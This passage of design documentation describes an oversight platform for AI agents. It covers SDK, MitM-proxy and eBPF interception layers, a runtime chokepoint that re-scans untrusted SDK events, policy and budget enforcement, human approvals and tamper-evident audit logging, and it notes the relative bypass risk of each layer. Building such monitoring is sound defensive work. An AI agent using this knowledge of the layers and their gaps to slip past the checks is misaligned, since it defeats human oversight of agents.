        subgraph layers["Three interception layers"]
            L1["L1 — In-process SDK<br/>(aa-sdk-client shims, aa-wasm)"]
            L2["L2 — Sidecar proxy<br/>(aa-proxy)"]
            L3["L3 — eBPF<br/>(aa-ebpf, kernel)"]
        end
        RT["aa-runtime<br/>per-agent chokepoint"]
    end

    subgraph control["Control plane"]
        GW["aa-gateway<br/>registry · policy · budget · audit"]
        API["aa-api<br/>HTTP / OpenAPI read API"]
    end

    subgraph persistence["Storage"]
        STORE[("aa-storage drivers<br/>memory / postgres / redis / sqlite-buffer")]
    end

    Dash["Dashboard / operators"]
    CLI["aasm CLI"]

    Agent --> L1 & L2 & L3
    L1 -->|UDS IpcFrame| RT
    L2 -->|forward| RT
    L3 -->|ring buffer| RT
    RT -->|gRPC PolicyService.CheckAction<br/>:50051| GW
    GW --> STORE
    API --> GW
    Dash -->|HTTP / WS| API
    CLI -->|gRPC| GW

The interception layers are deployment-independent: a deployment can run any subset (SDK only, SDK + proxy, all three). Each layer turns an agent action into an event in the aa-proto schema.
aa-runtime is the per-agent chokepoint. Because the SDK is untrusted, the runtime re-scans every event (the enforcement stage in aa-runtime/src/pipeline/enforcement.rs) before forwarding it.
aa-gateway is the brain. It hosts the agent registry, the policy engine, per-team budgets, and the audit pipeline, and it serves gRPC on :50051.
aa-api depends on aa-gateway in-process and re-exposes its read surfaces over HTTP with an OpenAPI schema (via utoipa) for the dashboard and tooling.
Storage is a pluggable trait facade (aa-storage) with swappable drivers, fronted by an in-process L1 cache (aa-cache).

Transport topology

Every cross-process message rides one of three transports. All gRPC and Unix-socket payloads share the aa-proto schema.

flowchart LR
    SDK["SDK shim<br/>(aa-sdk-client)"] -- "UDS IpcFrame" --> RT["aa-runtime"]
    RT -- "gRPC :50051" --> GW["aa-gateway"]
    PROXY["aa-proxy"] -- "gRPC :50051" --> GW
    EBPF["aa-ebpf"] -- "ring buffer → events" --> RT
    GW -- "in-process dep" --> API["aa-api"]
    DASH["Dashboard"] -- "HTTP / OpenAPI :7700" --> API
    CLI["aasm CLI"] -- "gRPC :50051" --> GW

Transport	Default endpoint	Carries	Who speaks it
gRPC	`127.0.0.1:50051` (TCP) or UDS	`PolicyService`, `AuditService`, `AgentLifecycleService`, `TopologyService`, `ApprovalService`, `SecretsService`, `InvalidationService`	`aa-runtime`, `aa-proxy`, `aa-cli` → `aa-gateway`
HTTP / OpenAPI	`127.0.0.1:7700` (`AA_API_ADDR`)	Read APIs: registry, topology, audit, costs, alerts, traces	Dashboard / tooling → `aa-api`
Unix domain socket (UDS)	per-agent socket	`IpcFrame` events from the in-process SDK	SDK shim → `aa-runtime`

The seven gRPC services are registered together in aa-gateway/src/server.rs; the gateway can serve them over either TCP (serve_tcp) or a Unix socket (serve_uds). The default gRPC listen address is 127.0.0.1:50051; the HTTP API default bind is 127.0.0.1:7700 (constant DEFAULT_ADDR in aa-api/src/config.rs, overridable via AA_API_ADDR).
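
The default-plus-override behaviour of the HTTP bind address can be sketched with the standard library alone. The helper names `resolve_api_addr` and `api_addr_from_env` are hypothetical; only the default value and the `AA_API_ADDR` variable come from the text above, and the real resolution logic in aa-api/src/config.rs may differ.

```rust
use std::net::{AddrParseError, SocketAddr};

/// Default HTTP bind address, as stated above.
const DEFAULT_ADDR: &str = "127.0.0.1:7700";

/// Resolve the bind address from an optional override string.
/// Hypothetical helper: the real logic lives in aa-api/src/config.rs.
pub fn resolve_api_addr(override_addr: Option<&str>) -> Result<SocketAddr, AddrParseError> {
    override_addr.unwrap_or(DEFAULT_ADDR).parse()
}

/// Read the override from the `AA_API_ADDR` environment variable, if set.
pub fn api_addr_from_env() -> Result<SocketAddr, AddrParseError> {
    let raw = std::env::var("AA_API_ADDR").ok();
    resolve_api_addr(raw.as_deref())
}
```

Returning a parse error for a malformed override, rather than silently falling back to the default, keeps a typo in the environment from binding the API somewhere unexpected.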

Where to go next

Component deep-dives — per-crate responsibilities, key types, and dependencies.
Key workflows — policy evaluation, agent registration, budget rollup, and the enforcement path as sequence diagrams.
Data flows — how an intercepted event travels from a layer through the gateway to the audit log and storage.
Security Model — the same system viewed through trust boundaries and defense-in-depth.

Last updated: 2026-06-11 by Chisanan232

Component deep-dives

This page walks through the major crates one by one: what each owns, its key types, and what it depends on. For the bird’s-eye map and the dependency diagram, start with System architecture.

All paths link into the master tree on GitHub.

`aa-gateway` — the governance brain

aa-gateway is the central decision-maker. It hosts the agent registry, the policy engine, per-team budgets, the audit pipeline, approvals, anomaly detection, and the seven gRPC services. Its module tree is large; the load-bearing sub-modules are:

Module	Responsibility
`registry/`	Agent registry — `AgentRecord` / `AgentRegistry` backed by `DashMap`, lineage, orphan handling, token issuance, storage bridge.
`policy/`	The policy engine (parse → validate → compile → evaluate). See below.
`budget/`	Per-agent and per-team spend tracking, pricing tables, and rollup. See below.
`engine/`	Decision caching, rate limiting, scope index, and the policy file watcher.
`service/`	gRPC service impls: `policy_service`, `audit_service`, `lifecycle_service`, `topology_service`, `approval_service`, `secrets_service`.
`audit.rs`, `audit_consumer.rs`, `audit_reader.rs`	The audit write path (`AuditWriter`), the NATS JetStream consumer, and the read API.
`sanitizer/`	The write-boundary `sanitize()` pass that drops “never store” data before persistence.
`invalidation/`	The push-invalidation hub that broadcasts policy/approval changes to subscribers.
`anomaly/`, `approval/`, `edges/`, `iam/`, `secrets/`, `ops/`	Anomaly baselines + responder, human-in-the-loop approvals, cross-team edge tracking, IAM, secret dispatch, and in-flight ops.
`server.rs`	Registers all seven services and serves over TCP (`serve_tcp`) or UDS (`serve_uds`).

Key types: AgentRecord, AgentRegistry, AgentStatus (registry/store.rs). Depends on: aa-core, aa-proto, aa-runtime, aa-storage, aa-cache. Serves: gRPC on 127.0.0.1:50051.

The policy engine (`aa-gateway/src/policy/`)

The engine turns a YAML/TOML policy bundle into a decision. Entry point is validator::PolicyValidator::from_yaml.

Module	Role
`raw.rs`	Deserialise the policy bundle (raw, untyped shape).
`validator.rs`	Structural validation → `PolicyValidator`, `PolicyValidatorOutput`.
`expr.rs`	Compile rule predicates into a typed expression tree.
`document.rs`	The evaluated `PolicyDocument` and its scoped policies (`ToolPolicy`, `NetworkPolicy`, `BudgetPolicy`, `DataPolicy`, `SchedulePolicy`).
`scope.rs`	`PolicyScope` plus `OrgId` / `TeamId` — the org → team → agent → tool cascade.
`network.rs`	`check_network_egress` → `EgressDecision` for L2 proxy egress checks.
`rbac.rs`	`required_role_for`, `CallerRole`, `MutationKind` — who may mutate which scope.
`history/`, `context.rs`, `error.rs`	Version history, evaluation context, and the `PolicyParseError` / `ValidationError` types.

The evaluation flow is detailed on the Key workflows page.

Budgets (`aa-gateway/src/budget/`)

Module	Role
`tracker.rs`	`BudgetTracker` — per-agent / per-team / global spend, daily + monthly windows, alert thresholds at 80 % / 95 %.
`pricing.rs`	`PricingTable` — per-model cost tables used to price an action.
`rollup.rs`	`BudgetRollup` / `BudgetRow` — composes agent / team / org / subtree rows for the dashboard, SDK, and CLI.
`persistence.rs`, `types.rs`	Durable budget state and the `BudgetAlert` / `BudgetState` / `BudgetWindow` types.

A request that would breach a budget downgrades from allow to deny. See budget tracking & rollup.
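
The allow-to-deny downgrade can be illustrated as follows. This is a minimal sketch under stated assumptions: `Decision`, `Window`, and `apply_budget` are hypothetical names, spend is tracked in integer micro-USD, and the rule "record spend only when the request goes through" is a choice made for this example rather than a description of `BudgetTracker`.

```rust
/// Hypothetical decision type for this sketch.
#[derive(Debug, PartialEq, Eq)]
pub enum Decision {
    Allow,
    Deny { reason: String },
}

/// A spend window with a hard limit, in micro-USD to avoid float rounding.
pub struct Window {
    pub spent_micros: u64,
    pub limit_micros: u64,
}

impl Window {
    /// True when adding `cost_micros` would push spend past the limit.
    pub fn would_breach(&self, cost_micros: u64) -> bool {
        self.spent_micros.saturating_add(cost_micros) > self.limit_micros
    }
}

/// Downgrade an otherwise-allowed request to Deny if any window would be
/// breached; record the spend only when the request goes through.
pub fn apply_budget(decision: Decision, cost_micros: u64, windows: &mut [Window]) -> Decision {
    if decision != Decision::Allow {
        return decision;
    }
    if windows.iter().any(|w| w.would_breach(cost_micros)) {
        return Decision::Deny { reason: "budget exceeded".to_string() };
    }
    for w in windows.iter_mut() {
        w.spent_micros += cost_micros;
    }
    Decision::Allow
}
```

Checking every window before mutating any of them keeps the update all-or-nothing: a request that fits the daily window but not the monthly one leaves both untouched.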

`aa-runtime` — the per-agent chokepoint

aa-runtime sits between an agent’s interception layers and the gateway. It is the mandatory chokepoint on the SDK fast-path (SDK → UDS → runtime → gateway). Because the SDK is untrusted, the runtime re-scans every event before forwarding.

Module	Role
`layer.rs`	`LayerDetector` / `LayerSet` bitflags — detects which of eBPF / proxy / SDK layers are active at startup.
`ipc/`	UDS server, length-prefixed `IpcFrame` codec, and the `ResponseRouter`.
`pipeline/`	Event aggregation: receive `IpcFrame`s, enrich, batch, fan out; the `enforcement.rs` scan/redact stage; `metrics.rs`.
`pipeline/enforcement.rs`	The authoritative scan/redact stage — fail-closed, oversized fields redacted whole, no `already_scanned` wire marker is honoured.
`gateway_client.rs`	Optional gRPC `PolicyServiceClient` forwarding `CheckAction` to the gateway.
`ebpf_bridge.rs`	Bridges eBPF ring-buffer events into the pipeline.
`l1_cache.rs`, `policy.rs`	Local policy cache + `PolicyRules` for offline / local-mode decisions.
`approval.rs`, `approval_sink.rs`	Approval queue and the `wait_for_approval` sink (timeout ⇒ `Decision::Pending`).
`invalidation_client.rs`	Subscribes to the gateway’s push-invalidation stream.
`audit_publisher/`, `correlation/`, `health/`	NATS audit publishing, correlation IDs, and health checks.

Key types: LayerSet, EnforcementConfig, PipelineEvent, EnrichedEvent. Depends on: aa-core, aa-proto, aa-ebpf.
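
To make "length-prefixed codec" concrete, here is a minimal framing sketch. The 4-byte big-endian prefix is an assumption for illustration; the actual `IpcFrame` header layout is defined in the `ipc/` module and may differ. The function names are hypothetical.

```rust
/// Encode one frame: 4-byte big-endian length, then the payload.
/// The prefix width and byte order are assumptions for this sketch.
/// Returns `None` if the payload does not fit in a u32 length.
pub fn encode_frame(payload: &[u8]) -> Option<Vec<u8>> {
    if payload.len() > u32::MAX as usize {
        return None;
    }
    let len = payload.len() as u32;
    let mut out = Vec::with_capacity(4 + payload.len());
    out.extend_from_slice(&len.to_be_bytes());
    out.extend_from_slice(payload);
    Some(out)
}

/// Try to decode one frame from the front of `buf`.
/// Returns the payload and the number of bytes consumed,
/// or `None` if more bytes are needed.
pub fn decode_frame(buf: &[u8]) -> Option<(&[u8], usize)> {
    if buf.len() < 4 {
        return None;
    }
    let len = u32::from_be_bytes([buf[0], buf[1], buf[2], buf[3]]) as usize;
    let end = 4usize.checked_add(len)?;
    let payload = buf.get(4..end)?;
    Some((payload, end))
}
```

A stream reader would call `decode_frame` in a loop, dropping the consumed bytes after each success and reading more from the socket whenever it returns `None`.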

The three interception layers

L1 — In-process SDK: `aa-sdk-client` (+ `aa-wasm`)

aa-sdk-client is the FFI-agnostic SDK runtime client. The per-language shims (Python / Node / Go, in their own repos) are thin wrappers over it.

Module	Role
`config.rs`	Resolve gateway endpoint / socket path / agent identity.
`codec.rs`	Wire codec for `IpcFrame` framing.
`ipc.rs`	UDS transport to `aa-runtime`.
`client.rs`	Lifecycle + send-event surface.
`preflight.rs`	Optional, feature-gated advisory credential preflight using `aa-security`.
`error.rs`	Client error taxonomy.

aa-wasm is a separate in-workspace target compiling governance components to WebAssembly (via wasm-bindgen) for browser / edge agents without a native sidecar.

Trust note: the SDK is not a security boundary — anything it asserts is re-verified by aa-runtime. See trust boundaries.

L2 — Sidecar proxy: `aa-proxy`

aa-proxy intercepts outbound HTTPS by acting as a man-in-the-middle (MitM) with a per-host CA, enforcing network-egress policy without changes to agent code.

Module	Role
`tls/`	Per-host CA (`ca.rs`), leaf-cert minting (`cert.rs`), OS keychain integration (`keychain.rs`).
`intercept/`	Detect, extract, and classify intercepted requests (`detect.rs`, `extract.rs`, `event.rs`), including MCP traffic (`mcp.rs`).
`proxy/`	The HTTP forwarding core (`http.rs`).
`mcp_enforce.rs`	MCP-specific enforcement.
`audit_jsonl.rs`	Local JSONL audit fallback.

Depends on: aa-core, aa-proto, aa-runtime, aa-sandbox.

L3 — eBPF: `aa-ebpf` (+ `aa-ebpf-common`, out-of-workspace probes)

Kernel hooks that watch SSL libraries (uprobes) and process exec / file syscalls. Linux-only, with the lowest bypass risk of the three layers.

Module	Role
`loader.rs`, `maps.rs`, `ringbuf.rs`	Load BPF programs, manage maps, drain the ring buffer to userspace.
`uprobe.rs`	Attach `SSL_write` / `SSL_read` uprobes to OpenSSL for plaintext capture.
`kprobe.rs`, `kprobes/`, `tracepoint.rs`, `syscall.rs`	Process exec / file syscall hooks.
`agent_discover.rs`, `lineage.rs`, `shell_detect.rs`	Discover governed processes, track lineage, detect shells.
`events.rs`, `alert.rs`, `error.rs`	Event types, alerts, error taxonomy.

aa-ebpf-common holds types shared between userspace and the BPF programs. aa-ebpf-probes / aa-ebpf-programs are the out-of-workspace BPF-target crates built by aa-ebpf/build.rs via aya-build.

Depends on: aa-core, aa-ebpf-common.

`aa-api` — the HTTP / OpenAPI read API

aa-api depends on aa-gateway in-process and re-exposes its read surfaces over HTTP (Axum) with an OpenAPI schema (utoipa). It is the dashboard’s backend.

Module	Role
`routes/`	One module per resource: `agents`, `topology`, `policies`, `audit`, `costs`, `alerts`, `traces`, `approvals`, `edges`, `iam`, `dispatch`, `tools`, `destinations`, `logs`, `ops`, `admin`, `auth`, `capability`.
`openapi.rs`	The generated OpenAPI document.
`ws/`, `events.rs`	WebSocket streaming + server-sent events for live dashboard updates.
`middleware/`, `auth/`	Request middleware and authentication.
`trace_store.rs`, `replay.rs`, `pagination.rs`	Trace storage, replay, and paged responses.
`server.rs`, `config.rs`	Axum server bootstrap; default bind `127.0.0.1:7700` (`DEFAULT_ADDR`, overridable via `AA_API_ADDR`).

Depends on: aa-core, aa-gateway, aa-runtime.

`aa-cli` — the `aasm` operator front-end

aa-cli ships the aasm binary. It talks gRPC to the gateway and HTTP to the API. Common subcommands: aasm status, aasm topology, aasm policy, aasm agent, aasm cost, aasm audit, aasm dashboard (TUI). The full surface is documented in the CLI Reference.

Depends on: aa-core, aa-gateway.

Foundation crates

`aa-core` — domain model + storage traits

The leaf crate that everything else builds on. It holds the Rust domain types and the storage trait contracts (std-gated).

Area	Contents
`identity.rs`	`AgentId` — an opaque 16-byte identity newtype.
`types/`	The wire domain types: `types::AgentId` (a `String` wire id, distinct from `identity::AgentId`), `AuditEvent`, `Credential`, `SessionCtx`, policy types.
`audit.rs`	`AuditEntry` — hash-chained, tamper-evident audit record.
`policy.rs`, `capability.rs`, `risk_tier.rs`, `dev_tool.rs`	Policy types, capability model, `RiskTier`, `GovernanceLevel`.
`storage/`	The six storage traits (`PolicyStore`, `AuditSink`, `CredentialStore`, `LifecycleStore`, `SessionStore`, `RateLimitCounter`), `StorageError`, and a `conformance` harness.
`topology/`, `evaluators.rs`, `time.rs`, `config.rs`	Topology edges + cycle detection, evaluators, time abstractions, config.
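
The idea behind a hash-chained, tamper-evident record can be sketched in a few lines. This is not the real `AuditEntry`: the `Entry` fields and the `append` / `verify` helpers are hypothetical, and `DefaultHasher` is used only to keep the example dependency-free. It is not a cryptographic hash, so a real audit chain would need one.

```rust
use std::collections::hash_map::DefaultHasher;
use std::hash::{Hash, Hasher};

/// Simplified stand-in for a hash-chained audit record.
#[derive(Debug, Clone)]
pub struct Entry {
    pub seq: u64,
    pub payload: String,
    pub prev_hash: u64,
    pub hash: u64,
}

/// Digest over (seq, payload, prev_hash). `DefaultHasher` is NOT cryptographic;
/// it only stands in for a real hash function in this sketch.
fn digest(seq: u64, payload: &str, prev_hash: u64) -> u64 {
    let mut h = DefaultHasher::new();
    seq.hash(&mut h);
    payload.hash(&mut h);
    prev_hash.hash(&mut h);
    h.finish()
}

/// Append an entry whose hash covers the previous entry's hash.
pub fn append(chain: &mut Vec<Entry>, payload: &str) {
    let seq = chain.len() as u64;
    let prev_hash = chain.last().map_or(0, |e| e.hash);
    let hash = digest(seq, payload, prev_hash);
    chain.push(Entry { seq, payload: payload.to_string(), prev_hash, hash });
}

/// Recompute every link; an edited or reordered entry breaks the chain.
pub fn verify(chain: &[Entry]) -> bool {
    let mut expected_prev = 0u64;
    for (i, e) in chain.iter().enumerate() {
        if e.seq != i as u64 || e.prev_hash != expected_prev {
            return false;
        }
        if e.hash != digest(e.seq, &e.payload, e.prev_hash) {
            return false;
        }
        expected_prev = e.hash;
    }
    true
}
```

Because each hash covers the previous one, changing any earlier entry invalidates every later link, which is what makes after-the-fact edits detectable.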

`aa-proto` — the wire schema

Protobuf definitions (under proto/, package prefix assembly.*.v1) compiled with prost / tonic. Defines the seven gRPC services and all wire messages. Every cross-process payload — gRPC and UDS alike — uses these types.

`aa-security` — credential scanner + redaction

A small leaf crate (only aho-corasick + serde) holding CredentialScanner, CredentialFinding, and Redaction. Extracted out of aa-core so both the runtime enforcement stage and the SDK preflight can depend on it without pulling in the full core.

Storage & cache

`aa-storage` — trait facade + driver registry

aa-storage re-exports the aa_core::storage traits and adds the runtime driver registry: StorageConfig, a Registry, factory traits, ConfigError, and register_builtin_drivers (memory / redis / postgres). It is the loader that the CLI’s aasm config validate and aasm config boot commands exercise.

Storage drivers

Crate	Backend	Notable deps
`aa-storage-memory`	In-process `DashMap` / `parking_lot`	none beyond `aa-storage` + `aa-core`
`aa-storage-postgres`	PostgreSQL via `sqlx`	`sqlx` (postgres), `testcontainers-modules`
`aa-storage-redis`	Redis via `redis` + `deadpool-redis`	builds on `aa-storage-memory` for session fallback
`aa-storage-sqlite-buffer`	Local SQLite write-buffer	`rusqlite` (bundled) — pinned to share `libsqlite3-sys` with `sqlx-sqlite`

Each driver implements the aa-core storage traits and is verified against the shared conformance harness.
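
The "one suite, many drivers" pattern looks roughly like this. The `KvStore` trait is a deliberately tiny, hypothetical stand-in for the real storage traits, and `run_conformance` is an assumed name; the point is only that the suite is generic over the trait, so every driver is held to identical checks.

```rust
use std::collections::HashMap;

/// Hypothetical, heavily simplified storage trait (the real traits live in aa-core).
pub trait KvStore {
    fn put(&mut self, key: &str, value: &str);
    fn get(&self, key: &str) -> Option<String>;
    fn delete(&mut self, key: &str) -> bool;
}

/// In-memory driver used here as the reference implementation.
#[derive(Default)]
pub struct MemoryStore {
    items: HashMap<String, String>,
}

impl KvStore for MemoryStore {
    fn put(&mut self, key: &str, value: &str) {
        self.items.insert(key.to_string(), value.to_string());
    }
    fn get(&self, key: &str) -> Option<String> {
        self.items.get(key).cloned()
    }
    fn delete(&mut self, key: &str) -> bool {
        self.items.remove(key).is_some()
    }
}

/// One shared suite: every driver must pass the same checks.
/// Returns the name of the first failed check, if any.
pub fn run_conformance<S: KvStore>(store: &mut S) -> Result<(), &'static str> {
    if store.get("k").is_some() {
        return Err("fresh store must be empty");
    }
    store.put("k", "v1");
    if store.get("k").as_deref() != Some("v1") {
        return Err("get after put");
    }
    store.put("k", "v2");
    if store.get("k").as_deref() != Some("v2") {
        return Err("put must overwrite");
    }
    if !store.delete("k") {
        return Err("delete existing key");
    }
    if store.delete("k") {
        return Err("second delete must report nothing removed");
    }
    Ok(())
}
```

A new driver earns its place by passing `run_conformance` unchanged, which keeps behavioural differences between backends from leaking into callers.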

`aa-cache` — in-process L1 cache

L1Cache<S: CacheSource> — a DashMap-backed, TTL’d, cache-aside wrapper over any store. Concurrent misses for the same key collapse to a single backend load (stampede protection). The gateway fronts its policy store with this cache.
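
A cache-aside read with a TTL can be sketched as below. This is a single-threaded illustration with hypothetical names (`TtlCache`, `get_or_load`); it uses a plain `HashMap` instead of `DashMap` and deliberately omits the stampede protection that the real `L1Cache` provides.

```rust
use std::collections::HashMap;
use std::time::{Duration, Instant};

/// Minimal single-threaded cache-aside wrapper with a per-entry TTL.
pub struct TtlCache {
    ttl: Duration,
    entries: HashMap<String, (String, Instant)>,
}

impl TtlCache {
    pub fn new(ttl: Duration) -> Self {
        TtlCache { ttl, entries: HashMap::new() }
    }

    /// Return the cached value if it is still fresh; otherwise call `load`,
    /// store the result with the current timestamp, and return it.
    pub fn get_or_load<F>(&mut self, key: &str, load: F) -> String
    where
        F: FnOnce() -> String,
    {
        let now = Instant::now();
        if let Some((value, stored_at)) = self.entries.get(key) {
            if now.duration_since(*stored_at) < self.ttl {
                return value.clone();
            }
        }
        let value = load();
        self.entries.insert(key.to_string(), (value.clone(), now));
        value
    }
}
```

In a concurrent setting, collapsing simultaneous misses into one backend load would additionally need a per-key lock or an in-flight future shared between callers, which this sketch leaves out.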

WASM tool sandbox: `aa-sandbox`

aa-sandbox hosts a wasmtime-based runtime that executes WASM-marked tools. It enforces three isolation surfaces — filesystem allowlist (WASI preopened dirs), CPU budget (wasmtime instruction fuel), and memory ceiling (Store limiter) — each surfaced as a deterministic SandboxError. It is consumed by aa-proxy via the tool-dispatch surface.

Test / conformance crates

conformance — the cross-crate trait conformance harness; every storage driver runs the same suite.
aa-integration-tests — end-to-end tests that wire multiple crates together (kept separate to avoid dependency cycles).

Key workflows

This page traces the four workflows that define agent-assembly’s runtime behaviour, each grounded in the real code path:

Policy evaluation
Agent registration
Budget tracking & rollup
Interception & enforcement

For component-level detail behind each box, see Component deep-dives; for the bird’s-eye map, see System architecture.

Policy evaluation

When aa-gateway receives a PolicyService.CheckAction RPC, the policy engine under aa-gateway/src/policy/ walks parse → validate → compile → scope cascade → budget → decision, then audits the result. The decision type (engine/decision.rs) is one of Allow, Deny, or RequireApproval.

flowchart TD
    Req["CheckActionRequest<br/>(action, target, labels)"] --> Cache{Decision<br/>cache hit?<br/>engine/cache.rs}
    Cache -->|hit| Resp
    Cache -->|miss| Parse["policy/raw.rs<br/>deserialise bundle"]
    Parse --> Validate["policy/validator.rs<br/>structural validation"]
    Validate --> Compile["policy/expr.rs<br/>compile predicates"]
    Compile --> Cascade["policy/document.rs + scope.rs<br/>org → team → agent → tool<br/>most-restrictive-wins"]
    Cascade --> Budget["budget/tracker.rs<br/>check team budget"]
    Budget --> Decide{PolicyDecision}
    Decide -->|Allow| Audit
    Decide -->|Deny| Audit
    Decide -->|RequireApproval| Approval["approval queue<br/>(timeout ⇒ Pending)"]
    Approval --> Audit
    Audit["audit.rs<br/>append hash-chained entry"] --> Resp["CheckActionResponse"]

Decision cache — engine/cache.rs short-circuits repeat lookups for the same (scope, action) key.
Parse + validate — policy/raw.rs deserialises the active bundle; policy/validator.rs enforces structural invariants (well-formed scopes, unique rule names).
Compile — policy/expr.rs turns rule predicates into a typed expression tree evaluated against the request’s ActionType, target, and labels.
Scope cascade — policy/document.rs + scope.rs walk org → team → agent → tool and merge most-restrictive-wins, with cycle detection on delegation.
Budget check — budget/tracker.rs (priced via budget/pricing.rs) downgrades an otherwise-allowed request to Deny if it would breach a budget.
Decision — engine/decision.rs yields Allow, Deny { reason }, or RequireApproval { timeout_secs }.
Audit — every decision is appended to the hash-chained audit log via audit.rs before the response is returned.
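
The most-restrictive-wins merge in the scope cascade step can be sketched by ordering the decision variants and taking the maximum. Everything here is an assumption made for illustration: the simplified `Decision` enum carries no payloads, `cascade` is a hypothetical function, and the default-deny fallback when no level has a matching rule is a choice of this sketch, not documented behaviour.

```rust
/// Hypothetical decision type; variants are declared from least to most
/// restrictive so the derived ordering can express "most restrictive wins".
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
pub enum Decision {
    Allow,
    RequireApproval,
    Deny,
}

/// A verdict contributed by one scope level, or `None` if that level
/// has no matching rule.
pub type ScopeVerdict = Option<Decision>;

/// Merge verdicts from org → team → agent → tool; the most restrictive wins.
/// With no matching rule at any level this sketch denies (an assumption).
pub fn cascade(verdicts: &[ScopeVerdict]) -> Decision {
    verdicts
        .iter()
        .flatten()
        .copied()
        .max()
        .unwrap_or(Decision::Deny)
}
```

With this ordering a permissive rule at a narrower scope can never override a stricter rule at a broader one: a team-level `Deny` still wins over a tool-level `Allow`.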

Latency targets and current p99 measurements live in Benchmarks — Policy Check p99.

Agent registration

Registration flows through AgentLifecycleService.Register (aa-gateway/src/service/lifecycle_service.rs), which validates delegation depth and writes into the DashMap-backed AgentRegistry. Agents then keep their record live with periodic Heartbeats.

sequenceDiagram
    autonumber
    participant Agent
    participant RT as aa-runtime
    participant LS as AgentLifecycleService<br/>(aa-gateway)
    participant Reg as AgentRegistry<br/>(registry/store.rs)
    participant Store as Storage<br/>(storage_bridge.rs)

    Agent->>RT: start with agent identity + parent
    RT->>LS: gRPC Register(RegisterRequest)
    LS->>LS: validate delegation depth<br/>(≤ DEFAULT_MAX_AGENT_DEPTH = 10)
    alt depth OK and not already registered
        LS->>Reg: insert AgentRecord (status Active)
        Reg->>Store: persist via storage bridge
        LS-->>RT: RegisterResponse (token)
    else already registered / depth exceeded
        LS-->>RT: AlreadyExists / FailedPrecondition
    end

    loop heartbeat interval
        RT->>LS: Heartbeat(HeartbeatRequest)
        LS->>Reg: refresh last-seen, recent events
        LS-->>RT: HeartbeatResponse (control commands?)
    end

Delegation depth — a sub-agent’s depth must not exceed DEFAULT_MAX_AGENT_DEPTH (10); over-deep registrations are rejected.
Lineage — the registry records parent/child links (registry/lineage.rs) so the topology tree and orphan handling (registry/orphan.rs) work.
Control stream — ControlStream lets the gateway push commands (e.g. SuspendCommand) back to a live agent.
Deregister — on shutdown the agent calls Deregister; orphaned children are handled per the configured OrphanMode.
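
The depth check at registration time can be sketched as follows. The `Registry` and `RegisterError` types are hypothetical simplifications, and two details are assumptions of this example: root agents are given depth 0, and an unknown parent is rejected. Only the limit of 10 and the "already registered" and "depth exceeded" outcomes come from the text above.

```rust
use std::collections::HashMap;

/// Maximum delegation depth, as stated above.
pub const DEFAULT_MAX_AGENT_DEPTH: u32 = 10;

#[derive(Debug, PartialEq, Eq)]
pub enum RegisterError {
    AlreadyExists,
    UnknownParent,
    DepthExceeded,
}

/// Hypothetical registry mapping agent id to delegation depth
/// (root agents have depth 0 in this sketch).
#[derive(Default)]
pub struct Registry {
    depth_by_id: HashMap<String, u32>,
}

impl Registry {
    /// Register `id` under an optional parent and return its depth.
    pub fn register(&mut self, id: &str, parent: Option<&str>) -> Result<u32, RegisterError> {
        if self.depth_by_id.contains_key(id) {
            return Err(RegisterError::AlreadyExists);
        }
        let depth = match parent {
            None => 0,
            Some(p) => self.depth_by_id.get(p).ok_or(RegisterError::UnknownParent)? + 1,
        };
        if depth > DEFAULT_MAX_AGENT_DEPTH {
            return Err(RegisterError::DepthExceeded);
        }
        self.depth_by_id.insert(id.to_string(), depth);
        Ok(depth)
    }
}
```

Storing the depth alongside each record makes the check O(1) per registration, since a child's depth is always its parent's depth plus one.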

Budget tracking & rollup

Every priced action updates the in-memory BudgetTracker; the dashboard, SDK, and CLI read a composed BudgetRollup across agent / team / org / subtree scopes.

flowchart LR
    subgraph track["Tracking (write path)"]
        Action["priced action<br/>(model + tokens)"] --> Price["budget/pricing.rs<br/>PricingTable"]
        Price --> Tracker["budget/tracker.rs<br/>BudgetTracker"]
        Tracker --> Windows["daily + monthly windows<br/>per agent / team / global"]
        Windows --> Alert{"≥ 80% / 95%?"}
        Alert -->|yes| Broadcast["BudgetAlert<br/>(broadcast channel)"]
    end

    subgraph roll["Rollup (read path)"]
        Req["GET /agents/{id}/budget<br/>or aasm policy show --show-budget"] --> Rollup["budget/rollup.rs<br/>BudgetRollup"]
        Rollup --> Rows["BudgetRow[]<br/>agent · team · org · subtree"]
    end

    Tracker -. read-only accessors .-> Rollup

Pricing — budget/pricing.rs converts model + token counts into a USD cost.
Windows — BudgetTracker keeps daily and monthly windows for each agent, each team, and the global total.
Alerts — crossing 80 % or 95 % of a limit emits a BudgetAlert on a broadcast channel (capacity 64) for live dashboards.
Rollup — budget/rollup.rs composes a BudgetRow per scope (agent, team:<id>, org, subtree) using the tracker’s read-only accessors — narrowest scope first. The same rollup drives both the HTTP endpoint and aasm policy show <agent_id> --show-budget.
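
Threshold alerts are easiest to reason about as "level before versus level after" a spend update. The sketch below assumes that an alert fires only when an update crosses into a higher level; that rule, the `AlertLevel` enum, and both function names are hypothetical and are not taken from `BudgetTracker`.

```rust
/// Alert levels for this sketch; the percentages match the thresholds above.
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
pub enum AlertLevel {
    Warning80,
    Critical95,
}

/// Highest threshold reached by `spent` out of `limit` (integer math, no floats).
fn level_for(spent: u64, limit: u64) -> Option<AlertLevel> {
    if limit == 0 {
        return None; // treat a zero limit as "no limit configured" (assumption)
    }
    let pct = (spent as u128) * 100 / (limit as u128);
    if pct >= 95 {
        Some(AlertLevel::Critical95)
    } else if pct >= 80 {
        Some(AlertLevel::Warning80)
    } else {
        None
    }
}

/// Emit an alert only when a spend update crosses into a higher level,
/// so a window sitting at 85% does not re-alert on every action.
pub fn alert_on_update(spent_before: u64, spent_after: u64, limit: u64) -> Option<AlertLevel> {
    let before = level_for(spent_before, limit);
    let after = level_for(spent_after, limit);
    if after > before {
        after
    } else {
        None
    }
}
```

Comparing levels rather than raw percentages means a single large action that jumps from 10 % straight to 99 % produces one critical alert instead of two.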

Interception & enforcement

An agent action is observed by one of the three layers, normalised into the aa-proto wire format, re-scanned by aa-runtime, then sent to the gateway for a decision. The runtime is the mandatory chokepoint: it never trusts the SDK’s assertions.

sequenceDiagram
    autonumber
    participant Agent
    participant SDK as L1 SDK shim<br/>(aa-sdk-client)
    participant Proxy as L2 proxy<br/>(aa-proxy)
    participant eBPF as L3 eBPF<br/>(aa-ebpf)
    participant RT as aa-runtime<br/>pipeline + enforcement
    participant GW as aa-gateway<br/>PolicyService

    alt L1 — in-process
        Agent->>SDK: tool / LLM / network call
        SDK->>RT: UDS IpcFrame (event)
    else L2 — sidecar
